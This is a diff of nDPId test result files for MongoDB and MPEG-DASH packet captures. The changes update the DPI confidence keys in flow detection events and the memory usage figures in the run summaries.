00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1483726705497,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"thread_ts_msec":1483726705497,"pkt":"ABsXAAEkACKDPxfFgQAAZAgARQAAQCMwQAA9BrgMCgoKDgoKCg\/wP2mJBNDEtQAAAACwwv\/\/uGgAAAIEBWoBAwMFAQEICjJ1xd4AAAAABAIAAA=="} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1483726705499,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1483726705499,"pkt":"ACKDPxfFABsXAAEkgQAAZAgARQAAPAAAQAA4BuBACgoKDwoKCg5pifA\/z9O+JwTQxLagUnEgLR0AAAIEBbQEAggKGQyESzJ1xd4BAwMH"} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1483726705503,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":70,"pkt_l4_len":32,"thread_ts_msec":1483726705503,"pkt":"ABsXAAEkACKDPxfFgQAAZAgARQAANDYCQAA9BqVGCgoKDgoKCg\/wP2mJBNDEts\/TviiAEBAavSkAAAEBCAoydcXkGQyESw=="} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1483726705497,"flow_last_seen":1483726705503,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1483726705503,"l3_proto":"ip4","src_ip":"10.10.10.14","dst_ip":"10.10.10.15","src_port":61503,"dst_port":27017,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1483558834969,"flow_last_seen":1483558835131,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1483726705503,"l3_proto":"ip4","src_ip":"10.10.10.12","dst_ip":"10.10.10.13","src_port":55582,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1483726705497,"flow_last_seen":1483726705503,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1483726705503,"l3_proto":"ip4","src_ip":"10.10.10.14","dst_ip":"10.10.10.15","src_port":61503,"dst_port":27017,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1483558834969,"flow_last_seen":1483558835131,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1483726705503,"l3_proto":"ip4","src_ip":"10.10.10.12","dst_ip":"10.10.10.13","src_port":55582,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} 00553{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":17,"source":"mongodb.pcap","alias":"nDPId-test","packets-captured":17,"packets-processed":16,"total-skipped-flows":0,"total-l4-payload-len":364,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":3,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":22,"global_ts_msec":1483737232974} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1483737232974,"flow_last_seen":1483737232974,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1483737232974,"l3_proto":"ip4","src_ip":"10.10.10.16","dst_ip":"10.10.10.17","src_port":51358,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1483737232974,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"thread_ts_msec":1483737232974,"pkt":"ABsXAAEkLGv11hfFgQAAZAgARQAAQB7UQAA6BjnMCgoKEAoKChHInmmJ0eCpcgAAAACwAv\/\/iv8AAAIEBWoBAwMFAQEICj5g2FMAAAAABAIAAA=="} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1483737232975,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1483737232975,"pkt":"ACKDPxfFABsXAAEkgQAAZAgARQAAPAAAQAAyBmCkCgoKEQoKChBpicie7T3P\/tHgqXOgEkXqkCgAAAIEBbQEAggKAY8GyD5g2FMBAwMI"} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1483737232979,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":70,"pkt_l4_len":32,"thread_ts_msec":1483737232979,"pkt":"ABsXAAEkLGv11hfFgQAAZAgARQAANFg1QAA6BgB3CgoKEAoKChHInmmJ0eCpc+09z\/+AEBAa9MAAAAEBCAo+YNhYAY8GyA=="} -00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1483737232974,"flow_last_seen":1483737232979,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":269,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1483737232979,"l3_proto":"ip4","src_ip":"10.10.10.16","dst_ip":"10.10.10.17","src_port":51358,"dst_port":27017,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":21,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1483726705497,"flow_last_seen":1483726705503,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1483737232979,"l3_proto":"ip4","src_ip":"10.10.10.14","dst_ip":"10.10.10.15","src_port":61503,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1483737232974,"flow_last_seen":1483737232979,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":269,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1483737232979,"l3_proto":"ip4","src_ip":"10.10.10.16","dst_ip":"10.10.10.17","src_port":51358,"dst_port":27017,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":21,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1483726705497,"flow_last_seen":1483726705503,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1483737232979,"l3_proto":"ip4","src_ip":"10.10.10.14","dst_ip":"10.10.10.15","src_port":61503,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} 00553{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":21,"source":"mongodb.pcap","alias":"nDPId-test","packets-captured":21,"packets-processed":20,"total-skipped-flows":0,"total-l4-payload-len":633,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":4,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":29,"global_ts_msec":1483814916005} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1483814916005,"flow_last_seen":1483814916005,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1483814916005,"l3_proto":"ip4","src_ip":"10.10.10.18","dst_ip":"10.10.10.19","src_port":64566,"dst_port":30000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1483814916005,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"thread_ts_msec":1483814916005,"pkt":"LGv11hfFABsXAAIwgQABLAgARQAAQILYQAA\/BvoMCgoKEgoKChP8NnUwNO8EYwAAAACwAv\/\/CB0AAAIEBVABAwMFAQEICh4cp5sAAAAABAIAAA=="} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1483814916005,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"thread_ts_msec":1483814916005,"pkt":"LGv11hfFLGv11hfMgQAAMggARQAAQILYQAA+BvsMCgoKEgoKChP8NnUwNO8EYwAAAACwAv\/\/CB0AAAIEBVABAwMFAQEICh4cp5sAAAAABAIAAA=="} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1483814916098,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1483814916098,"pkt":"LGv11hfMLGv11hfFgQAAMggARQAAPAAAQAA9Bn7pCgoKEwoKChJ1MPw2EZaBKjTvBGSgEjiQwtwAAAIEBbQEAggKUsc3tB4cp5sBAwMJ"} -00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1483814916005,"flow_last_seen":1483814916108,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":73,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1483814916108,"l3_proto":"ip4","src_ip":"10.10.10.18","dst_ip":"10.10.10.19","src_port":64566,"dst_port":30000,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} -00812{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":27,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1483814916005,"flow_last_seen":1483814916108,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":73,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1483814916108,"l3_proto":"ip4","src_ip":"10.10.10.18","dst_ip":"10.10.10.19","src_port":64566,"dst_port":30000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":27,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1483737232974,"flow_last_seen":1483737232979,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":269,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1483814916108,"l3_proto":"ip4","src_ip":"10.10.10.16","dst_ip":"10.10.10.17","src_port":51358,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} +00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1483814916005,"flow_last_seen":1483814916108,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":73,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1483814916108,"l3_proto":"ip4","src_ip":"10.10.10.18","dst_ip":"10.10.10.19","src_port":64566,"dst_port":30000,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} +00812{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":27,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1483814916005,"flow_last_seen":1483814916108,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":73,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1483814916108,"l3_proto":"ip4","src_ip":"10.10.10.18","dst_ip":"10.10.10.19","src_port":64566,"dst_port":30000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":27,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1483737232974,"flow_last_seen":1483737232979,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":269,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1483814916108,"l3_proto":"ip4","src_ip":"10.10.10.16","dst_ip":"10.10.10.17","src_port":51358,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} 00555{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":27,"source":"mongodb.pcap","alias":"nDPId-test","packets-captured":27,"packets-processed":27,"total-skipped-flows":0,"total-l4-payload-len":706,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":5,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":5,"total-idle-flows":5,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":37,"global_ts_msec":1483814916108} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 27/27 @@ -43,9 +43,9 @@ ~~ total active/idle flows...: 5/5 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5876598 bytes -~~ total memory freed........: 5876598 bytes -~~ total allocations/frees...: 118161/118161 +~~ total memory allocated....: 6010232 bytes +~~ total memory freed........: 6010232 bytes +~~ total allocations/frees...: 120923/120923 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 463 chars ~~ json string max len.......: 817 chars diff --git a/test/results/mpeg-dash.pcap.out b/test/results/mpeg-dash.pcap.out index 10c78fd9d..98b98b899 100644 --- a/test/results/mpeg-dash.pcap.out +++ b/test/results/mpeg-dash.pcap.out @@ -4,25 +4,25 @@ 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"mpeg-dash.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1618744212035,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1618744212035,"pkt":"AAAAAAAAAAQAk2VwCABFAAA8XJFAAEAGk4MKVAFRpviYCu3+AFDXU1UdAAAAAKAC\/\/+5fwAAAgQFtAQCCArQulhbAAAAAAEDAwo="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"mpeg-dash.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1618744212169,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1618744212169,"pkt":"AAAAAAAAAAMAbDnzCABFAAA0AABAADAGAB2m+JgKClQBUQBQ7f6v9cxW11NVHoASchAbdQAAAgQFeAEBBAIBAwMK"} 00894{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"mpeg-dash.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1618744212202,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":382,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":382,"pkt_l4_len":348,"thread_ts_msec":1618744212202,"pkt":"AAAAAAAAAAQAk2VwCABFAAFwXJNAAEAGkk0KVAFRpviYCu3+AFDXU1Uer\/XMV1AYAFYA8wAAR0VUIC9hcy9iaWdvLWFkLWNyZWF0aXZlcy8zczMvMmxPVEE3Lm1wNCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKExpbnV4OyBBbmRyb2lkIDExOyBTTS1BNzE1RiBCdWlsZC9SUDFBLjIwMDcyMC4wMTI7IHd2KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBWZXJzaW9uLzQuMCBDaHJvbWUvODkuMC40Mzg5LjEwNSBNb2JpbGUgU2FmYXJpLzUzNy4zNg0KYmlnby1oYXNoOiBWRkJOek8zaVZjdkdwV05kDQpIb3N0OiBnZGwubmV3cy1jZG4uc2l0ZQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQoNCg=="} -01094{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"mpeg-dash.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1618744212035,"flow_last_seen":1618744212202,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":328,"flow_tot_l4_payload_len":328,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1618744212202,"l3_proto":"ip4","src_ip":"10.84.1.81","dst_ip":"166.248.152.10","src_port":60926,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"HTTP.MpegDash","breed":"Acceptable","category":"Media"},"http": {"hostname":"gdl.news-cdn.site","url":"gdl.news-cdn.site\/as\/bigo-ad-creatives\/3s3\/2lOTA7.mp4","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; SM-A715F Build\/RP1A.200720.012; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/89.0.4389.105 Mobile Safari\/537.36"}} +01094{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"mpeg-dash.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1618744212035,"flow_last_seen":1618744212202,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":328,"flow_tot_l4_payload_len":328,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1618744212202,"l3_proto":"ip4","src_ip":"10.84.1.81","dst_ip":"166.248.152.10","src_port":60926,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"6":"DPI"},"proto":"HTTP.MpegDash","breed":"Acceptable","category":"Media"},"http": {"hostname":"gdl.news-cdn.site","url":"gdl.news-cdn.site\/as\/bigo-ad-creatives\/3s3\/2lOTA7.mp4","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; SM-A715F Build\/RP1A.200720.012; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/89.0.4389.105 Mobile Safari\/537.36"}} 00552{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":5,"source":"mpeg-dash.pcap","alias":"nDPId-test","packets-captured":5,"packets-processed":4,"total-skipped-flows":0,"total-l4-payload-len":1728,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1652784807797} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"mpeg-dash.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1652784807797,"flow_last_seen":1652784807797,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1652784807797,"l3_proto":"ip4","src_ip":"192.168.2.105","dst_ip":"54.161.101.85","src_port":59142,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"mpeg-dash.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1652784807797,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1652784807797,"pkt":"tKXvZygQwDiWIaSpCABFAAA8gI1AAEAGWyfAqAJpNqFlVecGAFDeWzbUAAAAAKAC+vAGuAAAAgQFtAQCCArGziP6AAAAAAEDAwc="} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"mpeg-dash.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1652784807901,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1652784807901,"pkt":"wDiWIaSptKXvZygQCABFAAA8AABAAOwGL7Q2oWVVwKgCaQBQ5waq30sm3ls21aASaN+YUwAAAgQFrAQCCAqvHVtJxs4j+gEDAwc="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"mpeg-dash.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1652784807901,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1652784807901,"pkt":"tKXvZygQwDiWIaSpCABFAAA0gI5AAEAGWy7AqAJpNqFlVecGAFDeWzbVqt9LJ4AQAfYtmQAAAQEICsbOJGKvHVtJ"} -00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"mpeg-dash.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1652784807797,"flow_last_seen":1652784807901,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1652784807901,"l3_proto":"ip4","src_ip":"192.168.2.105","dst_ip":"54.161.101.85","src_port":59142,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MpegDash.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"mpeg-dash.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1652784807797,"flow_last_seen":1652784807901,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1652784807901,"l3_proto":"ip4","src_ip":"192.168.2.105","dst_ip":"54.161.101.85","src_port":59142,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"MpegDash.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 